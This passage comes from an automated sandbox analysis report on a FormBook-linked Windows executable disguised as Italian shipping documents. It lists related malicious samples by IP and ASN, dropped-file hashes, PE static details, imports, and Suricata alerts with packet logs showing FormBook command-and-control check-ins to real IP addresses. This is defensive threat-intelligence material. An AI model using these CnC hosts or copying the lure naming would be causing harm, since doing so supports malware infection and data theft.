                      www.2bhp.comncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 81.88.63.46
                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                      • 81.88.63.46
                      www.palcoconnector.netncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      www.uburn.xyzncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      COGENT-174USES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
                      • 38.181.21.65
                      PO2024033194.exeGet hashmaliciousFormBookBrowse
                      • 154.23.184.240
                      PO #86637.exeGet hashmaliciousFormBookBrowse
                      • 154.23.184.240
                      RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                      • 206.119.82.172
                      https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 154.59.122.79
                      file.exeGet hashmaliciousFormBookBrowse
                      • 38.47.158.160
                      05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                      • 23.237.9.139
                      BJgQPShJE7.elfGet hashmaliciousMirai, MoobotBrowse
                      • 154.42.40.237
                      S1WVSiZOLX.elfGet hashmaliciousMirai, MoobotBrowse
                      • 154.7.19.178
                      mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                      • 199.97.14.129
                      VIMRO-AS15189USncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189
                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189
                      SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exeGet hashmaliciousFormBookBrowse
                      • 67.223.118.13
                      LisectAVT_2403002B_466.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189
                      H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                      • 67.223.118.13
                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                      • 67.223.119.7
                      file.exeGet hashmaliciousLummaC, Clipboard Hijacker, LummaC StealerBrowse
                      • 67.223.119.7
                      Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189
                      ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                      • 67.223.117.189
                      OrderPI.exeGet hashmaliciousFormBookBrowse
                      • 67.223.117.189
                      REGISTER-ASITfile.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      file.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      Quote 05-302.lnkGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 81.88.63.46
                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                      • 81.88.63.46
                      Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      https://mpticketing.logolsolutions.it/Get hashmaliciousUnknownBrowse
                      • 81.88.52.157
                      6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      8htbxM8GPX.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                      • 195.110.124.133
                      CONFLUENCE-NETWORK-INCVGRECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      http://kateandkaylearningacademy.comGet hashmaliciousUnknownBrowse
                      • 208.91.196.253
                      po2240134.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.39
                      LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      SecuriteInfo.com.W32.AutoIt.AQ.gen.Eldorado.22170.7541.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      PO098765678.exeGet hashmaliciousFormBookBrowse
                      • 208.91.197.27
                      Shipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
                      • 66.81.203.135
                      PO76389.exeGet hashmaliciousFormBookBrowse
                      • 66.81.203.200

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\21E1tK1Ol

                      Download File
                      Process:C:\Windows\SysWOW64\taskkill.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\Sancha

                      Download File
                      Process:C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):287232
                      Entropy (8bit):7.9957441252533
                      Encrypted:true
                      SSDEEP:6144:nJzqHXQ6MpNcJ6sETbfGoWIWTAn6SqY577/IavIqxToF3NScc+VEQ864ppXyyu1d:J6MPEJETbf+IWT46Sf577FvIb0t+VxTt
                      MD5:A9DDFED5C7303CC2FFA11D8168C14BEA
                      SHA1:B7F4CAB3A330A55487D92BC06AF19F51EADF3178
                      SHA-256:ED31C97A78753C930D7BC2B70B8AEAA2A0187E2F67126FC3D6B2EC366AD77CB3
                      SHA-512:D473F10539B9360D7B73BB76E15511E524367D55950C6B1910D62066F217D5EDB113A75BDF1F315F9B1FC5B488D2B9CCE55BF7F7F18E3A2E1939E3E3B0BB983D
                      Malicious:false
                      Reputation:low
                      Preview:|....3N7L`..L...u.G3...j59...23N7L85REHSCPIYG0EV3B61ZSE23N7.85RKW.MP.P...W...e2:6.C<X+JT?e+2->&-gR vA7X.3=ev|..!WQ7kE^ItIYG0EV3;78.n%U.sW+..2".I...c'W.L....:4.(...pXR..!0+m)>.0EV3B61Z..23.6M8.R.)SCPIYG0E.3@7:[XE2cJ7L85REHSC.]YG0UV3BV5ZSEr3N'L85PEHUCPIYG0EP3B61ZSE2SJ7L:5REHSCRI..0EF3B&1ZSE"3N'L85REHCCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSC~=<?DEV3.x5ZSU23NgH85BEHSCPIYG0EV3B6.ZS%23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85REHSCPIYG0EV3B61ZSE23N7L85R

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.56005110149538
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:AWB_5771388044 Documenti di spedizione.exe
                      File size:1'398'875 bytes
                      MD5:15fcfde4bcde8e7dce181856e02b1b24
                      SHA1:1e87dd4312940e1aa8c3844953a61bc095772418
                      SHA256:d53e08fc9d3d0153b73b816b38fed23a03f6fa94135ff483e4634d0141c9cbdd
                      SHA512:76bb5e9df29c04719fd2abede98a14981b5c9bfb7b82ef7f3cc2f940a9f4606004776c711dffbe58b3f8c27b95143806df76a401090bbbcebeaca4fb0c2ccc4a
                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCfGQ9QVK6dCMbJa/Bv1vcdkX4SLrWsZhc:7JZoQrbTFZY1iaCqjuB9vcerWsM
                      TLSH:D855F221FAC69036C1B327B19E7FF76A9A3D69360336D29727C81D211EA05417B29733
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                      File Icon

                      Icon Hash:1733312925935517

                      Static PE Info

                      General

                      Entrypoint:0x4165c1
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                      Entrypoint Preview

                      Instruction
                      call 00007FAA547F57EBh
                      jmp 00007FAA547EC65Eh
                      int3
                      int3
                      int3
                      int3
                      int3
                      push ebp
                      mov ebp, esp
                      push edi
                      push esi
                      mov esi, dword ptr [ebp+0Ch]
                      mov ecx, dword ptr [ebp+10h]
                      mov edi, dword ptr [ebp+08h]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007FAA547EC7DAh
                      cmp edi, eax
                      jc 00007FAA547EC976h
                      cmp ecx, 00000080h
                      jc 00007FAA547EC7EEh
                      cmp dword ptr [004A9724h], 00000000h
                      je 00007FAA547EC7E5h
                      push edi
                      push esi
                      and edi, 0Fh
                      and esi, 0Fh
                      cmp edi, esi
                      pop esi
                      pop edi
                      jne 00007FAA547EC7D7h
                      jmp 00007FAA547ECBB2h
                      test edi, 00000003h
                      jne 00007FAA547EC7E6h
                      shr ecx, 02h
                      and edx, 03h
                      cmp ecx, 08h
                      jc 00007FAA547EC7FBh
                      rep movsd
                      jmp dword ptr [00416740h+edx*4]
                      mov eax, edi
                      mov edx, 00000003h
                      sub ecx, 04h
                      jc 00007FAA547EC7DEh
                      and eax, 03h
                      add ecx, eax
                      jmp dword ptr [00416654h+eax*4]
                      jmp dword ptr [00416750h+ecx*4]
                      nop
                      jmp dword ptr [004166D4h+ecx*4]
                      nop
                      inc cx
                      add byte ptr [eax-4BFFBE9Ah], dl
                      inc cx
                      add byte ptr [ebx], ah
                      ror dword ptr [edx-75F877FAh], 1
                      inc esi
                      add dword ptr [eax+468A0147h], ecx
                      add al, cl
                      jmp 00007FAA56C64FD7h
                      add esi, 03h
                      add edi, 03h
                      cmp ecx, 08h
                      jc 00007FAA547EC79Eh
                      rep movsd
                      jmp dword ptr [00000000h+edx*4]

                      Rich Headers

                      Programming Language:
                      • [ C ] VS2010 SP1 build 40219
                      • [C++] VS2010 SP1 build 40219
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2010 SP1 build 40219
                      • [RES] VS2010 SP1 build 40219
                      • [LNK] VS2010 SP1 build 40219

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                      RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                      RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                      RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                      RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                      RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                      RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                      RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                      RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                      RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                      RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                      RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                      RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                      RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                      RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                      RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                      RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                      RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                      RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                      RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                      RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                      Imports

                      DLLImport
                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishGreat Britain
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-22T18:02:25.044941+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973654.179.173.6080TCP
                      2024-09-22T18:02:49.600999+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449741206.119.82.14780TCP
                      2024-09-22T18:03:03.365570+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974581.88.63.4680TCP
                      2024-09-22T18:03:16.780789+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974967.223.117.18980TCP
                      2024-09-22T18:03:30.374979+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44975385.159.66.9380TCP
                      2024-09-22T18:03:59.827293+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449757208.91.197.2780TCP
                      2024-09-22T18:04:19.036132+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449761195.161.68.880TCP
                      2024-09-22T18:04:32.644463+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449765194.58.112.17480TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 22, 2024 18:02:24.022723913 CEST4973680192.168.2.454.179.173.60
                      Sep 22, 2024 18:02:24.039338112 CEST804973654.179.173.60192.168.2.4
                      Sep 22, 2024 18:02:24.039493084 CEST4973680192.168.2.454.179.173.60
                      Sep 22, 2024 18:02:24.047411919 CEST4973680192.168.2.454.179.173.60
                      Sep 22, 2024 18:02:24.060112953 CEST804973654.179.173.60192.168.2.4
                      Sep 22, 2024 18:02:25.043641090 CEST804973654.179.173.60192.168.2.4
                      Sep 22, 2024 18:02:25.044871092 CEST804973654.179.173.60192.168.2.4
                      Sep 22, 2024 18:02:25.044940948 CEST4973680192.168.2.454.179.173.60
                      Sep 22, 2024 18:02:25.049072981 CEST4973680192.168.2.454.179.173.60
                      Sep 22, 2024 18:02:25.057683945 CEST804973654.179.173.60192.168.2.4
                      Sep 22, 2024 18:02:40.555911064 CEST4973880192.168.2.4206.119.82.147
                      Sep 22, 2024 18:02:40.593111038 CEST8049738206.119.82.147192.168.2.4
                      Sep 22, 2024 18:02:40.593288898 CEST4973880192.168.2.4206.119.82.147
                      Sep 22, 2024 18:02:40.616561890 CEST4973880192.168.2.4206.119.82.147
